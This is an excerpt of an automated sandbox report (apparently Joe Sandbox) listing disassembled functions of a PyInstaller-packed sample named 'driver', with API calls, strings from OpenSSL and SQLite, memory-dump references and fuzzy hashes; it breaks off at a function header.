GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
GetTokenInformation.ADVAPI32 ref: 00007FF6A29B87B8
GetLastError.KERNEL32 ref: 00007FF6A29B87C2
GetTokenInformation.ADVAPI32 ref: 00007FF6A29B8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
CloseHandle.KERNEL32 ref: 00007FF6A29B8836

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: 41ece37a4328fe3f6e51a6a49f81d5a84e2f04b7c11ff0dbe27ce9ef364b58b6
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 06217431B4D64242EB109B96F45423AA3E1FF85FA8F500235EA6D83AEADFFCD4449700

Function 00007FF6A29CB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6A29CB1CF
FlsGetValue.KERNEL32 ref: 00007FF6A29CB1E4
FlsSetValue.KERNEL32 ref: 00007FF6A29CB205
FlsSetValue.KERNEL32 ref: 00007FF6A29CB232
FlsSetValue.KERNEL32 ref: 00007FF6A29CB243
FlsSetValue.KERNEL32 ref: 00007FF6A29CB254
SetLastError.KERNEL32 ref: 00007FF6A29CB26F

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: c20b891bb48f0ce348f93c0f3e3481852e5ce6b0160f645aa80b9a1a8ea36ff4
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 79219F20E8F2424AFA68A763966527D61435F64FBCF404734D93EC7ADBDEACB440A301

Function 00007FF6A29D7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6A29D7E0D
GetLastError.KERNEL32 ref: 00007FF6A29D7E19
CloseHandle.KERNEL32 ref: 00007FF6A29D7E31
CreateFileW.KERNEL32 ref: 00007FF6A29D7E5C
WriteConsoleW.KERNEL32 ref: 00007FF6A29D7E7B

Strings

CONOUT$, xrefs: 00007FF6A29D7E3D

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 39731ba6fb0802c0d1220f5abc0855caa74505b38164f0b7dc7ad03596006346
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 37114932A59B4286E7508B53E85432963E1FB98FE8F044234EA5DC77A6DFBCD844A740

Function 00007FF8A8042310 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A80A808D

Strings

..\s\ssl\statem\statem_clnt.c, xrefs: 00007FF8A80A8024, 00007FF8A80A80AB, 00007FF8A80A80C7, 00007FF8A80A82DE, 00007FF8A80A837D, 00007FF8A80A83FA, 00007FF8A80A8444, 00007FF8A80A8476
resumption, xrefs: 00007FF8A80A83AA
tls_process_new_session_ticket, xrefs: 00007FF8A80A801D, 00007FF8A80A82D2, 00007FF8A80A8371, 00007FF8A80A843D
SHA2-256, xrefs: 00007FF8A80A825C

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
API String ID: 3535234312-1635961163
Opcode ID: c6821a383222e6fa30d2e0f4eea8c61ca47568722241768c4b415a5a37fba74c
Instruction ID: 6fd28431b02f905c55d470424f58c9dae13733b55db9bb99c091fe809e8203a9
Opcode Fuzzy Hash: c6821a383222e6fa30d2e0f4eea8c61ca47568722241768c4b415a5a37fba74c
Instruction Fuzzy Hash: B002A172A0AA8695EB608B15E4403BEB7A0FB84BC4F148136DE8D477D5DF3CE561C728

Function 00007FF8A86EEE60 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86EEF06

Strings

hidden, xrefs: 00007FF8A86EF2FD
vtable constructor failed: %s, xrefs: 00007FF8A86EF079
vtable constructor did not declare schema: %s, xrefs: 00007FF8A86EF1B8
vtable constructor called recursively: %s, xrefs: 00007FF8A86EF032

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 22509725-1299490920
Opcode ID: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
Instruction ID: 72d15d6c964161bc28ea556ca6d798aa698a110c98b95237c16186dc81482fa6
Opcode Fuzzy Hash: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
Instruction Fuzzy Hash: 3F02BC62A0AB85A3FB548B11E44837A77A1FB88BD4F046231DE4D07B95EF3CE441C364

Function 00007FF6A29B8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B85E9

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B870A

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: 9db512d9e5dc9811b878b40bf45de6b8a1355c29298a3473d900e4f9ea779674
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: 1341B462B5A68285EA309B13A5406AA6394FF88FCCF440135DF8DD7B8BDEBCE501D701

Function 00007FF8A867C090 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A867C1DD
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A867C337

Strings

database corruption, xrefs: 00007FF8A867C190, 00007FF8A867C2D7
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A867C183, 00007FF8A867C2CA
%s at line %d of [%.10s], xrefs: 00007FF8A867C19C, 00007FF8A867C2E3

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 22509725-3727861699
Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction ID: 97db739274a5c07f49ff4e3020bd9373a426ac0e4950e8d883ea2a7b2f78e6ec
Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction Fuzzy Hash: FCF1ADB260AB8196EB90CF19E0487AD77A0FB84BD4F109036EE8E43755DF39D894C754

Function 00007FF6A29B90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29B8760: GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
Part of subcall function 00007FF6A29B8760: OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
Part of subcall function 00007FF6A29B8760: GetTokenInformation.ADVAPI32 ref: 00007FF6A29B87B8
Part of subcall function 00007FF6A29B8760: GetLastError.KERNEL32 ref: 00007FF6A29B87C2
Part of subcall function 00007FF6A29B8760: GetTokenInformation.ADVAPI32 ref: 00007FF6A29B8802
Part of subcall function 00007FF6A29B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
Part of subcall function 00007FF6A29B8760: CloseHandle.KERNEL32 ref: 00007FF6A29B8836

LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B916C
LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B9175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF6A29B9157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6A29B9183
S-1-3-4, xrefs: 00007FF6A29B9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6A29B9142

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 61ea2e333c8ae59a66370b6b33421511b738edf6cd7ec0991e42372fcaa7f86f
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 9E218031A5A74286F710AB22E5152EA63A1FF88B88F444035EA4DD7787DFBCD805A750

Function 00007FF6A29CB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB347
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB37D
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3CC
SetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3E7

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 4ff33f96e10842e483defba3b1a6c28c84005d5533e1d23eb5a295cf7448bdda
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: 5B118E20F8F2428AFA58A723966123D61425F54FBCF444335E86EC6BC7DEACB441A301

Function 00007FF8A86A8CA0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86A8EBD
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86A8F8C
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86A908C

Strings

"%w" , xrefs: 00007FF8A86A8D4B
%Q%s, xrefs: 00007FF8A86A8FF2

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: "%w" $%Q%s
API String ID: 22509725-1987291987
Opcode ID: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
Instruction ID: 5ab70928af0e06a6220f5815db4b5b18066be62e1681e9d72040a757d410f42b
Opcode Fuzzy Hash: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
Instruction Fuzzy Hash: FDC11322A0AB82A6FA14CF15A44827AA7A1FF51BE0F185235DE6E077D1DF3CE450C724

Function 00007FF8A86710D0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86713A7
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8671415

Strings

database corruption, xrefs: 00007FF8A867115E
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8671152
%s at line %d of [%.10s], xrefs: 00007FF8A867116A

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 22509725-3727861699
Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction ID: d290d9278d6791c5927b77d619aea799a8fc88f106f6dcd084e30db9374548fd
Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction Fuzzy Hash: 34A11972A0E2D1A5E7248B1994987BD7BA2FB807C0F055236DBCA83785EF3CD055C764

Function 00007FF8A86A7D30 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86A7F3E
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86A7FA9

Strings

Cannot add a column to a view, xrefs: 00007FF8A86A7DE4
virtual tables may not be altered, xrefs: 00007FF8A86A7DC8
sqlite_altertab_%s, xrefs: 00007FF8A86A7EFD

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 22509725-2063813899
Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction ID: 1678fa628eb68d615f9041584b556b808ab93368c92b8a29b08139f4084eef87
Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction Fuzzy Hash: 73910462A0AB8596FB54CF11A0582BAB7B1FB48BC4F45A235DE8D07785EF3CE050C324

Function 00007FF8A867B100 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A8679940: 00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86799AD
Part of subcall function 00007FF8A8679940: 00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86799D4

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A867B383
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A867B399

Strings

database corruption, xrefs: 00007FF8A867B1C0
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A867B1A7
%s at line %d of [%.10s], xrefs: 00007FF8A867B1C7

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 22509725-3727861699
Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction ID: 44e2da5485d3f8ac52e9d1b1d82f38ac80e4c028be5824106864cd54443bf7e4
Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction Fuzzy Hash: 6481F072B0A682ABE7648F25E0487AE73A1FB847C4F009036EB8D43791DF38E445C754

Function 00007FF6A29B2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E

Strings

Error, xrefs: 00007FF6A29B2A0E
Error [ANSI Fallback], xrefs: 00007FF6A29B29FF
[PYI-%d:ERROR] , xrefs: 00007FF6A29B2966
%s: %s, xrefs: 00007FF6A29B29E8

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 4c7b0c115121c1cbbd8fae8cf1599d275707e7a567bc843d9d4be60a5255390a
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 8731F422B5A68156F7209B62A8502F76295BF88FDCF400132EE8DC375BEFBCD5469300

Function 00007FF6A29B2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

